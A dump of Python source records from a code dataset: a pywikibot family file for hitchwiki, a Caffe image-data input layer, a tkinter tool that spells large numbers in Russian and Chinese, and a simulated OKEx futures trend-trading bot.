Diskussion',\n 'fr' : u'Discussion Hitchwiki',\n 'pl' : u'Dyskusja Autostopwiki',\n 'pt' : u'CaronaWiki Discussão',\n 'ru' : u'Обсуждение Hitchwiki',\n 'tr' : u'Otostopviki tartışma',\n 'bg' : u'Hitchwiki беседа',\n 'es' : u'Autostopwiki Discusión',\n 'fi' : u'Keskustelu Liftariwikiinista',\n 'nl' : u'Overleg Hitchwiki',\n }\n self.namespaces[14] = {\n '_default': u'Category',\n 'de': u'Kategorie',\n 'fr': u'Catégorie',\n 'ru': u'Категория',\n 'fi': u'Luokka',\n 'nl': u'Categorie',\n 'pl': u'Kategoria',\n 'pt': u'Categoria',\n 'ro': u'Categorie',\n 'ru': u'Категория',\n 'sv': u'Kategori',\n 'es': u'Categoría',\n 'bg': u'Категория',\n 'tr': u'Kategori',\n }\n\n# self.namespaces[1] = {\n# '_default': [u'Talk', self.namespaces[4]['_default']],\n# 'de': [u'Diskussion', self.namespaces[4]['_default']],\n# }\n# self.namespaces[2] = {\n# '_default': [u'User', self.namespaces[4]['_default']],\n# 'de': [u'Benutzer', self.namespaces[4]['_default']],\n# 'es': [u'Usuario', self.namespaces[4]['_default']],\n# }\n#\n# self.namespaces[4] = {\n# '_default': [u'Hitchwiki', self.namespaces[4]['_default']],\n# 'de' : [u'Tramperwiki', self.namespaces[4]['_default']],\n# }\n# self.namespaces[5] = {\n# '_default': [u'Hitchwiki talk', self.namespaces[5]['_default']],\n# 'de' : [u'Tramperwiki Diskussion', self.namespaces[4]['_default']],\n# }\n#\t\n# self.namespaces[14] = {\n# '_default': [u'Category', self.namespaces[4]['_default']],\n# 'de': [u'Kategorie', self.namespaces[4]['_default']],\n# }\n def hostname(self,code):\n return 'hitchwiki.org'\n\n def scriptpath(self, code):\n return '/%s/index.php' % code\n\n def apipath(self, code):\n return '/%s/api.php' % code\n\n def shared_image_repository(self, code):\n return ('en', 'en')\n\n def version(self, code):\n return \"1.19.2\"\n\n","sub_path":"families/hitchwiki_family.py","file_name":"hitchwiki_family.py","file_ext":"py","file_size_in_byte":4806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"423307313","text":"# -*- coding: utf-8 -*-\r\nfrom ..layer_operation import LayerOperation\r\nimport numpy as np\r\nfrom scipy.misc import imread\r\nfrom scipy.misc import imresize\r\nimport random\r\nimport csv\r\nimport sys\r\nimport caffe\r\nfrom caffe import layers as L\r\n\r\nfrom src.DLMDL.caffe_adaptor import tempNet # TODO: DLMDL에 solver 따로 만들거나 변경시 재검토 필요\r\n\r\nclass op_caffe_jpeg_input(LayerOperation):\r\n\r\n _attributes = \"\"\"[{\"default\": \"datasets\", \"source\": \"opt\", \"mandatory\": \"all\", \"name\": \"option\"}, {\"default\": \"jpg\", \"source\": \"opt\", \"mandatory\": \"all\", \"name\": \"file_format\"}, {\"source\": \"opt\", \"mandatory\": \"all\", \"name\": \"data_path\"}, {\"source\": \"opt\", \"mandatory\": \"all\", \"name\": \"label_path\"}, {\"source\": \"opt\", \"mandatory\": \"all\", \"name\": \"batch_size\"}, {\"source\": \"opt\", \"mandatory\": \"all\", \"name\": \"iteration\"}, {\"source\": \"layer\", \"mandatory\": \"all\", \"name\": \"image_size\"}, {\"source\": \"layer\", \"mandatory\": \"all\", \"name\": \"output_shape\"}]\"\"\"\r\n\r\n def compile_time_operation(self, learning_option, cluster):\r\n option = learning_option.get(\"option\", self.option)\r\n file_format = learning_option.get(\"file_format\", self.file_format)\r\n data_path = learning_option.get(\"data_path\", self.data_path)\r\n label_path = learning_option.get(\"label_path\", self.label_path)\r\n batch_size = learning_option.get(\"batch_size\", self.batch_size)\r\n iteration = learning_option.get(\"iteration\", self.iteration)\r\n image_size = self.image_size\r\n output_shape = self.output_shape\r\n \r\n # for shmcaffe\r\n #learning_option[\"move_rate\"] = learning_option.get(\"move_rate\", 0.2)\r\n #learning_option[\"tau\"] = learning_option.get(\"tau\", 1)\r\n\r\n # Phase checkpoint setting, PHASE: 0 for trian, 1 for test\r\n isTrainTest = 0\r\n if option.lower() == \"test\":\r\n temp_include = dict(phase=caffe.TEST)\r\n data_path = learning_option.get(\"test_data_path\", data_path)\r\n test_label_path = learning_option.get(\"test_label_path\", label_path)\r\n batch_size = learning_option.get(\"test_batch_size\", batch_size)\r\n elif option.lower() == \"datasets\":\r\n temp_include = dict(phase=caffe.TRAIN)\r\n elif option.lower() == \"train_test\":\r\n temp_include = dict(phase=caffe.TRAIN)\r\n isTrainTest = 1\r\n else:\r\n temp_include = dict(phase=caffe.TRAIN)\r\n\r\n # DB Data\r\n if file_format.lower() in [\"lmdb\", \"leveldb\"]:\r\n # Backend checkpoint setting, default value 0 (leveldb) for backend\r\n # Data layer setting\r\n image, label = L.Data(name=self.name, source=data_path,\r\n batch_size=batch_size, backend=(0 if file_format.lower()==\"leveldb\" else 1), include=temp_include, ntop=2)\r\n\r\n if isTrainTest == 1:\r\n data_path = learning_option.get(\"test_data_path\", data_path)\r\n batch_size = learning_option.get(\"test_batch_size\", batch_size)\r\n temp_image, temp_label = L.Data(name=self.name, source=data_path,\r\n batch_size=batch_size,\r\n backend=(0 if file_format.lower() == \"leveldb\" else 1),\r\n include=dict(phase=caffe.TEST), ntop=2)\r\n setattr(tempNet, str(self.name) + '.image', temp_image)\r\n setattr(tempNet, str(self.name) + '.label', temp_label)\r\n\r\n # Image Data\r\n # TODO: HDF5 와 같은 형식을 또 다른 개별 종륭의 layer 사용 가능하나 현재 raw image 파일 형식만 들어온다고 가정\r\n else :\r\n # Read and parse the source directory\r\n \r\n ''' for uninfo -twkim\r\n with open(data_path+'/'+label_path, 'r') as f:\r\n lines = f.readlines()\r\n new_lines = []\r\n for line in lines:\r\n new_lines.append('/'+line.split()[0]+'.'+file_format + ' ' + line.split()[1]+'\\n')\r\n with open(data_path+'/'+label_path.split('.')[0]+'_caffelist.txt', 'w') as f:\r\n f.writelines(new_lines)\r\n f.close()\r\n '''\r\n \r\n # Image Data layer setting\r\n image, label = L.ImageData(name=self.name,\r\n source=data_path + '/' + label_path.split('.')[0] + '_caffelist.txt',\r\n batch_size=batch_size, include=temp_include, ntop=2, root_folder=data_path,\r\n new_height=image_size[1], new_width=image_size[0])\r\n\r\n if isTrainTest == 1:\r\n data_path = learning_option.get(\"test_data_path\", data_path)\r\n batch_size = learning_option.get(\"test_batch_size\", batch_size)\r\n label_path = learning_option.get(\"test_label_path\", label_path)\r\n\r\n # Read and parse the source directory\r\n ''' for uninfo - twkim\r\n with open(data_path + '/' + label_path, 'r') as f:\r\n lines = f.readlines()\r\n new_lines = []\r\n for line in lines:\r\n new_lines.append('/' + line.split()[0] + '.' + file_format + ' ' + line.split()[1] + '\\n')\r\n with open(data_path + '/' + label_path.split('.')[0] + '_caffelist.txt', 'w') as f:\r\n f.writelines(new_lines)\r\n f.close()\r\n '''\r\n # Test image data layer setting\r\n temp_image, temp_label = L.ImageData(name=self.name,\r\n source=data_path + '/' + label_path.split('.')[0] + '_caffelist.txt',\r\n batch_size=batch_size, include=dict(phase=caffe.TEST), ntop=2,\r\n root_folder=data_path, new_height=image_size[1],\r\n new_width=image_size[0])\r\n setattr(tempNet, str(self.name) + '.image', temp_image)\r\n setattr(tempNet, str(self.name) + '.label', temp_label)\r\n\r\n # Record the layer output information\r\n self.set_output('image', image)\r\n self.set_output('label', label)\r\n self.set_dimension('image', image_size)\r\n try:\r\n if isTrainTest != 1:\r\n del learning_option['option']\r\n del learning_option['file_format']\r\n del learning_option['data_path']\r\n del learning_option['label_path']\r\n del learning_option['batch_size']\r\n del learning_option['iteration']\r\n learning_option['max_iter'] = iteration\r\n except KeyError:\r\n pass\r\n\r\n try:\r\n del learning_option['test_data_path']\r\n del learning_option['test_label_path']\r\n del learning_option['test_batch_size']\r\n learning_option['test_iter'] = learning_option.get(\"test_iteration\", 100)\r\n del learning_option['test_iteration']\r\n except KeyError:\r\n pass\r\n\r\n def run_time_operation(self, learning_option, cluster):\r\n pass\r\n","sub_path":"src/DLMDL/LayerOperation/caffe.old/jpeg_input.py","file_name":"jpeg_input.py","file_ext":"py","file_size_in_byte":7246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"326374896","text":"\"\"\"\nАвтор: Виктор Сюй © 2021\nАвтор имеет все права на использование, распространение, адаптацию, и т. п., касающиеся данной программы.\nПочта для обратной связи: viktor.p.xu@yandex.ru\n\"\"\"\n\nimport random\nfrom itertools import chain\nimport tkinter as tk\n\n\ndef generator():\n n = random.choices([p for p in range(10)], k=random.randint(4, 13))\n nu = ''\n for i in n:\n nu += str(i)\n return int(nu)\n\n\n# convert it to russian\nclass Russian:\n def __init__(self, o):\n self.dic1 = {1: 'один', 2: 'два', 3: 'три', 4: 'четыре', 5: 'пять', 6: 'шесть', 7: 'семь', 8: 'восемь',\n 9: 'девять'}\n self.dic2 = {10: 'десять', 11: \"одиннадцать\", 12: \"двенадцать\", 13: \"тринадцать\", 14: \"четырнадцать\",\n 15: \"пятнадцать\", 16: \"шестнадцать\", 17: \"семнадцать\", 18: \"восемнадцать\", 19: 'девятнадцать',\n 20: 'двадцать', 30: 'тридцать', 40: 'сорок', 50: 'пятьдесят', 60: 'шестьдесят', 70: 'семьдесят',\n 80: 'восемьдесят', 90: 'девяносто'}\n self.dic3 = {1: \"сто\", 2: 'двести', 3: 'триста', 4: 'четыреста', 5: 'пятьсот', 6: 'шестьсот', 7: 'семьсот',\n 8: 'восемьсот', 9: 'девятьсот'}\n self.dic4_1 = {1: 'тысяча', 2: 'миллион', 3: 'миллиард', 4: 'триллион'}\n self.dic4_2 = {1: 'тысячи', 2: 'миллиона', 3: 'миллиарда', 4: 'триллиона'}\n self.dic4_3 = {1: 'тысяч', 2: 'миллионов', 3: 'миллиардов', 4: 'триллионов'}\n self.o = o\n\n def _read_three(self, str_n):\n hun = int(str_n[0])\n rest = int(str_n[1:3])\n if self.dic2.get(rest) is not None:\n return (self.dic3.get(hun, '') + ' ' + self.dic2.get(rest, '')).lstrip(' ').replace(' ', ' ')\n else:\n temp = str(rest).rjust(2, '0')\n rest1 = int(temp[0]) * 10\n rest2 = int(temp[1])\n return (self.dic3.get(hun, '') + ' ' + self.dic2.get(rest1, '') + ' ' + self.dic1.get(rest2, '')) \\\n .lstrip(' ').replace(' ', ' ')\n\n def _gender(self, str_tho):\n li = str_tho.split(' ')\n if li[-1] == 'один':\n li[-1] = 'одна'\n elif li[-1] == 'два':\n li[-1] = 'две'\n return ' '.join(li)\n\n def _case(self, str_three):\n li = str_three.split(' ')\n case1 = ['один', \"одна\"]\n case2 = ['два', \"две\", \"три\", \"четыре\"]\n if li[-1] in case1:\n return self.dic4_1\n elif li[-1] in case2:\n return self.dic4_2\n else:\n return self.dic4_3\n\n def run(self):\n li = [i.rjust(3, '0') for i in format(self.o, ',').split(',')]\n ls = []\n un = []\n for k in li:\n ls.append(self._read_three(k))\n if len(li) == 1:\n return ' '.join(ls)\n elif len(li) >= 2:\n ls[-2] = self._gender(ls[-2])\n for i, item in enumerate(ls):\n un.append(self._case(item).get(len(li) - 1 - i, ''))\n return ' '.join(list(chain.from_iterable(zip(ls, un))))\n\n\nclass Chinese:\n def __init__(self, o):\n self.dic1 = {1: '一', 2: '二', 3: '三', 4: '四', 5: '五', 6: '六', 7: '七', 8: '八', 9: '九', 0: '零'}\n self.dic2 = {1: \"万\", 2: '亿', 3: '兆'}\n self.o = o\n\n def _str_split(self, o):\n s = str(o)\n li = list(s)\n leng = int(len(li) / 4)\n result = []\n for i in range(leng):\n temp = []\n for q in range(4):\n temp.append(li.pop())\n result.append(''.join(temp[::-1]).rjust(4, '0'))\n if any(li):\n result.append(''.join(li).rjust(4, '0'))\n return result[::-1]\n\n def _read_four(self, str_four):\n d1, d2, d3, d4 = str_four\n # n_r = str(int(str_four))\n r = self.dic1.get(int(d1), '') + '千' + self.dic1.get(int(d2), '') + '百' + self.dic1.get(int(d3), '') \\\n + '十' + self.dic1.get(int(d4), '')\n no_list = ['零千', '零百', '零十', '零零', '零零']\n for i in no_list:\n r = r.replace(i, '零')\n return r.rstrip('零').replace('二千','两千').replace('二百','两百')\n\n def run(self):\n li = self._str_split(str(self.o))\n ls = []\n un = []\n for i in li:\n ls.append(self._read_four(i))\n for k in range(len(li)):\n un.append(self.dic2.get(len(li) - 1 - k, ''))\n return ''.join(list(chain.from_iterable(zip(ls, un)))).lstrip('零')\n\n\nclass Show:\n def __init__(self):\n self.num = 0\n\n def update(self):\n self.num = generator()\n label_r = tk.Label(win, text=' '*30000 + '\\n' + ' '*30000, font=('Times New Roman', 15), wraplength=700)\n label_c = tk.Label(win, text=' '*30000 + '\\n' + ' '*30000, font=('Times New Roman', 15), wraplength=700)\n label_r.place(relx=0.5, rely=0.45, anchor='center')\n label_c.place(relx=0.5, rely=0.55, anchor='center')\n\n def show_number(self):\n r = tk.StringVar()\n r.set(format(self.num, ','))\n label_n = tk.Label(win, textvariable=r, font=('', 40), bg=win.cget('bg'), width=width, anchor='center')\n label_n.place(relx=0.5, rely=0.3, anchor='center')\n\n\n def show_russian(self):\n r_r = tk.StringVar()\n count_r = int(str(r_r).replace('PY_VAR', ''))\n label_r = tk.Label(win, text='', font=('Times New Roman', 15), wraplength=700)\n if int(count_r / 2) == count_r / 2:\n label_r['text'] = Russian(self.num).run()\n else:\n label_r['text'] = Russian(self.num).run() + '\\n' + Russian(self.num).run()\n label_r['fg'] = win.cget('bg')\n label_r.place(relx=0.5, rely=0.45, anchor='center')\n\n def show_chinese(self):\n c_r = tk.StringVar()\n count_c = int(str(c_r).replace('PY_VAR', ''))\n label_c = tk.Label(win, text='', font=('Times New Roman', 15), wraplength=700)\n if int(count_c / 2) == count_c / 2:\n label_c['text'] = Chinese(self.num).run()\n else:\n label_c['text'] = Chinese(self.num).run()\n label_c['fg'] = win.cget('bg')\n label_c.place(relx=0.5, rely=0.55, anchor='center')\n\n\nif __name__ == '__main__':\n win = tk.Tk()\n win.title('Big Number Generator')\n width = 800\n height = 600\n win.geometry(f'{width}x{height}')\n label0 = tk.Label(win, text=\"Big Number Generator\", font=('Times New Roman', 30))\n label0.place(relx=0.5, rely=0.15, anchor='center')\n label1 = tk.Label(win, text=\"Автор: Виктор Сюй © 2021\\nАвтор имеет все права на использование, распространение, \"\n \"адаптацию, и т. п., касающиеся данной программы.\\nПочта для обратной связи: \"\n \"viktor.p.xu@yandex.ru\")\n label1.place(relx=0.5, rely=0.9, anchor='center')\n show = Show()\n button0 = tk.Button(win, text='Generate', command=lambda: [show.update(), show.show_number()])\n button0.place(relx=0.5, rely=0.7, anchor='center')\n button_r = tk.Button(win, text='Русский', command=lambda: show.show_russian())\n button_r.place(relx=0.3, rely=0.7, anchor='center')\n button_c = tk.Button(win, text='中文', command=lambda: show.show_chinese())\n button_c.place(relx=0.7, rely=0.7, anchor='center')\n win.mainloop()\n","sub_path":"Project003——bignumber/big_number_generator/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":7913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"455530857","text":"from concurrent.futures import ThreadPoolExecutor\nimport time,datetime\nimport collections\nimport sys, os, traceback\nimport logging\nfrom abc import ABC, abstractmethod\n\nsys.path.append('D:\\BitCoin\\Code\\codebase')\nfrom helpText import errorTexts, statusTexts\nfrom util import createLogger\nfrom utilTrade import getKline\nfrom utilException import catchExceptionDecorator, catchMethodExceptionDecorator\nfrom collections import namedtuple\n\n\nglobalTrendTrading = False\n\nclass TradeSide:\n Long = 'Long'\n Short = 'Short'\n def otherSide(side):\n if side == TradeSide.Long:\n return TradeSide.Short\n elif side == TradeSide.Short:\n return TradeSide.Long\n else:\n print('Error in TradeSide.otherSide({})'.format(side))\nPosition = namedtuple('Position', ['side', 'price'])\n\nclass SlarkBase(ABC):\n def __init__(self, exch, logLevel, symbol, contractType, cfg, name):\n self.logger = createLogger(symbol, logLevel)\n self.symbol = symbol\n self.contractType = contractType\n self.name = name\n self.createExch(exch)\n self.initializeCfg(cfg) # call the derived methods\n self.initialize()\n self.logger.info('****************************************************************')\n self.logger.info('********************* New Test Starts ************************')\n self.logger.info('****************************************************************')\n self.logger.info('{} instance initialized successfully.'.format(self.name))\n\n @abstractmethod\n def createExch(self, exch):\n pass\n @abstractmethod\n def initializeCfg(self, cfg):\n pass\n @abstractmethod\n def initialize(self):\n pass\n\nclass SlarkTrend(SlarkBase):\n def __init__(self, exch, logger, symbol, contractType, cfg, name):\n super(SlarkTrend, self).__init__(exch, logger, symbol, contractType, cfg, name)\n def initialize(self):\n self.highestFromPosition = 0\n self.lowestFromPosition = 0\n self.__updateMktData()\n self.state = 'NULL'\n # (TradeSide, tradePrice[, amount]) 最终是要在一个进程或者系统里面管理所有的position和信号,还是需要有position的其他信息\n self.position = None \n\n def createExch(self, exch):\n self.traderTrend = exch.okexExchTrade()\n self.account = exch.okexExchAccount()\n self.marketData = exch.okexExchMarketData()\n self.logger.info('SlarkTrend exchanges traderTrend, account and marketData, have been initialized successfully.')\n\n def initializeCfg(self, cfg):\n self.cfgMktDataUpdateIntervalInMinute = int(cfg.get(self.symbol+self.name, 'mktDataUpdateIntervalInMinute'))\n self.cfgPastIntervalNumber = int(cfg.get(self.symbol+self.name, 'pastIntervalNumber'))\n self.cfgKBull = float(cfg.get(self.symbol+self.name, 'kBull'))\n self.cfgKBear = float(cfg.get(self.symbol+self.name, 'kBear'))\n self.cfgBullFlipRatio = float(cfg.get(self.symbol+self.name, 'bullFlipRatio'))\n\n #def __updateUserInfo(self):\n # symbolInfo = self.account.future_userinfo()['info'][self.symbol[0:3]]\n # free = symbolInfo['account_rights']\n # self.coin = free[]\n # self.cny = free['cny']\n\n @catchMethodExceptionDecorator\n def __updateBenchLine(self):\n histData = self.marketData.future_kline(self.symbol, self.contractType, '1min', self.cfgMktDataUpdateIntervalInMinute * self.cfgPastIntervalNumber)\n histHighestPrice = max([x[2] for x in histData])\n histLowestPrice = min([x[3] for x in histData])\n histHighestClose = max([x[4] for x in histData])\n histLowestClose = min([x[4] for x in histData])\n self.bullRange = histHighestPrice - histLowestClose\n self.bearRange = histLowestPrice - histHighestClose\n self.currentIntervalStartPrice = self.currentPrice\n self.bullTradeEntry = self.currentIntervalStartPrice + self.bullRange * self.cfgKBull\n self.stopLoseMoneyPriceLong = self.bullRange * self.cfgKBull / 2 # 多仓下跌的平仓价差\n self.bearTradeEntry = self.currentIntervalStartPrice + self.bearRange * self.cfgKBear\n self.stopLoseMoneyPriceShort = self.bearRange * self.cfgKBear / 2 # 空仓上涨的平仓价差\n # 这里不设置state为NULL的原因:\n # \t如果之前是bull,在高位买,更新bench后,NULL下的bear线太低,承担整个价差的亏损;\n #\t\t如果新的currentIntervalStartPrice的价格过高,就会导致止损价格太高,立刻止损\n # 现在使用新的标准进行平仓,原来的理由不成立;设置为NULL可以更灵敏:达到新的bearEntry和降低超过stopLose 都会触发平仓\n # 前一种情况也可以减少损失;但到底是否是多头?还是说如果处于多头空间,不改状态,不开空仓?\n self.state = 'NULL' \n self.logger.info('UpdateBenchLine StartPrice: {:.2f}, bullEntry: {:.2f}, bearEntry: {:.2f}\\n\\\n bullRange: {:.2f}, bearRange: {:.2f}, stopLoseLong: {:.2f}, stopLoseShort: {:.2f}'.format(\n self.currentIntervalStartPrice, self.bullTradeEntry, self.bearTradeEntry, \n self.bullRange, self.bearRange, self.stopLoseMoneyPriceLong, self.stopLoseMoneyPriceShort))\n self.updatedBenchLineInPastIntervalFlag = True\n\n @catchMethodExceptionDecorator\n def updateBenchLineTimly(self):\n intervalVal = 0\n self.__updateBenchLine()\n global globalTrendTrading\n globalTrendTrading = True\n while True:\n while intervalVal == int((datetime.datetime.now().minute + datetime.datetime.now().hour * 60)/ self.cfgMktDataUpdateIntervalInMinute + 1):\n time.sleep(self.cfgMktDataUpdateIntervalInMinute) # sleep second\n intervalVal = int((datetime.datetime.now().minute + datetime.datetime.now().hour * 60)/ self.cfgMktDataUpdateIntervalInMinute + 1)\n self.__updateMktData()\n if not self.updatedBenchLineInPastIntervalFlag:\n self.logger.info(''.center(100, '-'))\n self.logger.info('Timly update bench line')\n self.__updateBenchLine()\n self.updatedBenchLineInPastIntervalFlag = False\n\n def __updateMktData(self):\n \"\"\"\n Prices is the time value sequence. Control the frequency! Or most slots are repeat!\n \"\"\"\n orderBook = self.marketData.future_depth(self.symbol, self.contractType, 15)\n self.bids = orderBook['bids']\n self.asks = orderBook['asks']\n self.bidPrice = self.bids[0][0]\n self.askPrice = self.asks[0][0]\n spread = self.askPrice - self.bidPrice\n self.askPrice -= 0.1 * spread\n self.bidPrice += 0.1 * spread\n self.currentPrice = (self.bidPrice + self.askPrice) / 2\n # highestFromPosition只在 processBULL()使用;processBULL()时候肯定有position,所以用这个值时候一定有position\n if self.currentPrice > self.highestFromPosition:\n self.highestFromPosition = self.currentPrice\n if self.currentPrice < self.lowestFromPosition:\n self.lowestFromPosition = self.currentPrice\n\n def unidirectional2InPast5Mins(self, state):\n \"\"\"\n Detect decrease 2 percents in the past 5mins if self.state == 'BULL'\n or increase 2 percents in the past 5mins if self.state == 'BEAR'\n \"\"\"\n histData = self.marketData.future_kline(self.symbol, dataType='1min', size = 5)\n histHighestPrice = max([x[2] for x in histData])\n histLowestPrice = min([x[2] for x in histData])\n ret = False\n ratio1 = self.currentPrice / histHighestPrice\n ratio2 = self.currentPrice / histLowestPrice \n if ('BULL' == state and ratio1 < 0.99) or \\\n ('BEAR' == state and ratio2 > 1.01):\n ret = True\n if ret:\n self.logger.info(''.center(100, '-'))\n if 'BULL' == self.state:\n self.logger.info('Down 2 percents in the past 5 minutes, current {} / highest {} = {}'.format(\n self.currentPrice, histHighestPrice, ratio1))\n else:\n self.logger.info('UP 2 percents in the past 5 minutes, current {} / lowest {} = {}'.format(\n self.currentPrice, histLowestPrice, ratio2))\n self.logger.info('histData {}'.format(histData))\n return ret\n\n def down3FromHighest(self):\n ratio = self.currentPrice / self.highestFromPosition\n if ratio < 0.97:\n self.logger.info(''.center(100, '-'))\n self.logger.info('Down 3 percents from the highest price, current {} / highest {} = {}'.format(\n self.currentPrice, self.highestFromPosition, ratio))\n return True\n return False\n\n def up3FromLowest(self):\n ratio = self.currentPrice / self.lowestFromPosition\n if ratio > 1.03:\n self.logger.info(''.center(100, '-'))\n self.logger.info('Up 3 percents from the lowest price, current {} / lowest {} = {}'.format(\n self.currentPrice, self.lowestFromPosition, ratio))\n return True\n return False\n\n def processNULL(self):\n # test and close current position\n # 这个stopLoseMoney相当于限制亏损,即从start移动n%的时候开仓\n # 如果从tradePrice反向移动n%/2的时候平仓,不会承受所有[start, openPosition]之间的亏损\n # stopLoseMoneyPriceShort is negative!\n if self.position:\n if TradeSide.Long == self.position['side']:\n if self.position['price'] - self.currentPrice > self.stopLoseMoneyPriceLong: \n self.logger.info(''.center(100, '-'))\n self.logger.info('Long stop lose money @ NULL')\n self.closePositionExecutor(TradeSide.Long)\n elif TradeSide.Short == self.position['side']:\n if self.position['price'] - self.currentPrice < self.stopLoseMoneyPriceShort:\n self.logger.info(''.center(100, '-'))\n self.logger.info('Short stop lose money @ NULL')\n self.closePositionExecutor(TradeSide.Short)\n else:\n self.logger.critical('Strange position {} in processNull.'.format(self.position))\n # 也有情况是,更新benchLine之后,startPrice > 原来的BULL线,这时候到新的bearEntry应该首先平仓,再开仓\n # 但是这样极端改变真的好?】在之前的BULL状态,同时在新的BEAR状态\n # test and enter a new state\n if self.currentPrice > self.bullTradeEntry:\n self.logger.info(''.center(100, '-'))\n self.logger.info('CurrentPrice {:.2f} is higher than bullTradeEntry {:.2f}'.format(\n self.currentPrice, self.bullTradeEntry))\n if self.position and self.position['side'] == TradeSide.Long:\n self.logger.info('Keep BULL @ NULL')\n else:\n self.trade(TradeSide.Long)\n self.__updateBenchLine()\n self.state = 'BULL' # updateBenchLine() 設置self.state為NULL,但這裡updateBenchLine()之後需要設置 state 為BULL\n elif self.currentPrice < self.bearTradeEntry:\n self.logger.info(''.center(100, '-'))\n self.logger.info('CurrentPrice {:.2f} is lower than bearTradeEntry {:.2f}'.format(\n self.currentPrice, self.bearTradeEntry))\n if self.position and self.position['side'] == TradeSide.Short:\n self.logger.info('Keep BEAR @ NULL')\n else:\n self.trade(TradeSide.Short) # In case of hold position, udpate benchmark and state\n self.__updateBenchLine()\n self.state = 'BEAR'\n else:\n pass\n #print('random walk between [BearEntry, BullEntry]')\n\n def processBULL(self):\n if self.currentPrice < self.bullTradeEntry:\n self.state = 'NULL'\n if self.position and TradeSide.Long == self.position['side']:\n # 止损\n if self.position['price'] - self.currentPrice > self.stopLoseMoneyPriceLong: \n self.logger.info(''.center(100, '-'))\n self.logger.info('Long stop lose money @ BULL')\n self.closePositionExecutor(TradeSide.Long)\n self.__updateBenchLine()\n # 止盈\n elif self.unidirectional2InPast5Mins(self.state) or self.down3FromHighest():\n self.closePositionExecutor(TradeSide.Long)\n self.__updateBenchLine()\n else:\n self.logger.info(''.center(100, '-'))\n self.logger.info('Keep BULL @ BULL')\n else:\n self.logger.info(''.center(100, '-'))\n self.logger.critical('No position in BULL state')\n\n def processBEAR(self):\n if self.currentPrice > self.bearTradeEntry:\n self.state = 'NULL'\n if self.position and TradeSide.Short == self.position['side']:\n if (self.position['price'] - self.currentPrice < self.stopLoseMoneyPriceShort):\n self.logger.info(''.center(100, '-'))\n self.logger.info('Short stop lose money @ BEAR')\n self.closePositionExecutor(TradeSide.Short)\n self.__updateBenchLine()\n elif self.unidirectional2InPast5Mins(self.state) or self.up3FromLowest():\n self.closePositionExecutor(TradeSide.Short)\n self.__updateBenchLine()\n else:\n self.logger.info(''.center(100, '-'))\n self.logger.info('Keep BEAR @ BEAR')\n else:\n self.logger.info(''.center(100, '-'))\n self.logger.critical('No position in BEAR state')\n\n def makeDecision(self):\n @catchMethodExceptionDecorator\n def makeDecisionHelper(self):\n self.__updateMktData()\n if self.state == 'NULL':\n self.processNULL()\n elif self.state == 'BULL':\n self.processBULL()\n elif self.state == 'BEAR':\n self.processBEAR()\n else:\n self.logger.critical('strange state {}'.format(self.state))\n while True:\n makeDecisionHelper(self)\n time.sleep(0.05) # If in high frequency, return 10001\n\n def closePositionExecutor(self, side):\n \"\"\"\n Only execute. Verification should be done by the caller.\n If close LONG position, should be SELL, so trade price should be askPrice.\n \"\"\"\n tradePrice = self.askPrice if (side == TradeSide.Long) else self.bidPrice\n if side == TradeSide.Long:\n initiateSide = 'buy'\n closeSide = 'sell'\n else:\n initiateSide = 'sell'\n closeSide = 'buy'\n self.logger.info('Close position: {}@{:.2f} - {}@{:.2f}'.format(\n initiateSide, self.position['price'], closeSide, tradePrice))\n self.logger.info('current {:.2f}, bid {:.2f}, ask {:.2f}'.format(self.currentPrice, self.bidPrice, self.askPrice))\n self.position = None # 反向交易,而不是cancel order【实盘交易时候肯定要考虑这个单子是否能成交】\n self.state = 'NULL'\n\n def closePosition(self, side):\n if self.position == None:\n self.logger.info('Dummy closePosition.')\n elif 'side' in self.position and self.position['side'] == side:\n self.closePositionExecutor(side)\n else:\n self.logger.critical('Current position is {} while want to close {} position.'.format(self.position, side))\n\n @catchMethodExceptionDecorator\n def trade(self, side):\n # 自己维持交易信息,开仓价格和仓位,便于closePositionExecutor()使用;官方参考价为ask价格,目前kline()具有一定误差,但可以接受\n # tradePrice与市场价之间的差?\n # 要打log\n self.__updateMktData()\n tradePrice = self.bidPrice if (side == TradeSide.Long) else self.askPrice\n self.closePosition(TradeSide.otherSide(side))\n #tradeAmount = self.coin if (side == 'sell') else self.cny / tradePrice\n #if abs(self.asks[0][0] - self.bids[0][0]) > self.currentPrice * 0.001: tradeAmount *= 0.9\n #if abs(self.asks[0][0] - self.bids[0][0]) > self.currentPrice * 0.002: tradeAmount *= 0.9\n #if abs(self.asks[0][0] - self.bids[0][0]) > self.currentPrice * 0.003: tradeAmount *= 0.9\n #self.position = {'side':side, 'price':tradePrice, 'amount': tradeAmount}\n self.position = {'side':side, 'price':tradePrice}\n self.highestFromPosition = self.currentPrice\n self.lowestFromPosition = self.currentPrice\n self.logger.info('{} {} at {:.2f}'.format(side, self.symbol.upper(), tradePrice))\n\nclass Slark:\n def trade(exch, symbol, contractType, cfg):\n global globalTrendTrading\n slarkTrend = SlarkTrend(exch, logging.INFO, symbol, contractType, cfg, 'BigTrend')\n try:\n with ThreadPoolExecutor(max_workers=2) as executor:\n executor.submit(slarkTrend.updateBenchLineTimly)\n while not globalTrendTrading:\n time.sleep(1)\n continue\n executor.submit(slarkTrend.makeDecision)\n except Exception as e:\n logger = createLogger('Slark', logging.INFO)\n logger.critical(e)\n logger.critical(traceback.format_exc())\n logger.critical('status')\n insts = [slarkTrend]\n for inst in insts:\n for item in inst.__dict__.items():\n inst.logger.critical('self.%s: %s'%(item[0], str(item[1])))\n ","sub_path":"btcTradingSystem/OKCoin/Code/SlarkMultithreadInstance/DualThrust_BigTrend/DualThrust_Spot_BigTrend_Future.py","file_name":"DualThrust_Spot_BigTrend_Future.py","file_ext":"py","file_size_in_byte":16272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
